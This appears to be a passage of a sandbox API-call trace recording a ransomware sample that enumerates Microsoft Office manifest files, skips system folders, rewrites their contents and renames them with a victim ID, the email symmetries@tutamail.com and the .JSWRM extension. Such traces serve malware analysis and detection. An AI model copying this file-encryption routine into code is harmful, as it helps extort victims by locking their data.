(hObject=0x458) returned 1 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0072.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.944] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP8BF9~1.XML")) returned 1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.944] lstrcmpiW (lpString1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.945] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=3375) returned 1 [0072.945] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x213678 [0072.945] ReadFile (in: hFile=0x458, lpBuffer=0x213678, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x213678*, lpNumberOfBytesRead=0x345ef6c*=0xd20, lpOverlapped=0x0) returned 1 [0072.947] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.948] WriteFile (in: hFile=0x458, lpBuffer=0x213678*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x213678*, lpNumberOfBytesWritten=0x345ef68*=0xd20, lpOverlapped=0x0) returned 1 [0072.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x213678 | out: hHeap=0x1e0000) returned 1 [0072.948] CloseHandle (hObject=0x458) returned 1 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0072.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.948] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.949] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x212876, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.common.xml", cAlternateFileName="AP3FD6~1.XML")) returned 1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2=".") returned 1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="..") returned 1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="...") returned 1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="windows") returned -1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="recovery") returned -1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="perflogs") returned -1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="documents and settings") returned -1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="system volume information") returned -1 [0072.949] lstrcmpiW (lpString1="AppXManifest.common.xml", lpString2="msocache") returned -1 [0072.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.common.xml", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0072.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.common.xml", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.common.xml", lpUsedDefaultChar=0x0) returned 23 [0072.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.common.xml", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0072.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.common.xml", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.common.xml", lpUsedDefaultChar=0x0) returned 23 [0072.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0072.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0072.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.950] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=2173046) returned 1 [0072.950] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.950] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.964] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.964] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.964] CloseHandle (hObject=0x458) returned 1 [0072.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0072.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0072.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0072.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0072.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0072.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0072.965] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2667, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifestLoc.en-us.xml", cAlternateFileName="AP942B~1.XML")) returned 1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2=".") returned 1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="..") returned 1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="...") returned 1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="windows") returned -1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="recovery") returned -1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="perflogs") returned -1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="documents and settings") returned -1 [0072.965] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.966] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="system volume information") returned -1 [0072.966] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="msocache") returned -1 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifestLoc.en-us.xml", lpUsedDefaultChar=0x0) returned 25 [0072.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x241218, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifestLoc.en-us.xml", lpUsedDefaultChar=0x0) returned 25 [0072.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0072.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0072.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.966] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9831) returned 1 [0072.966] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2660) returned 0x24b1c8 [0072.966] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x2660, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x2660, lpOverlapped=0x0) returned 1 [0073.005] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.005] WriteFile (in: 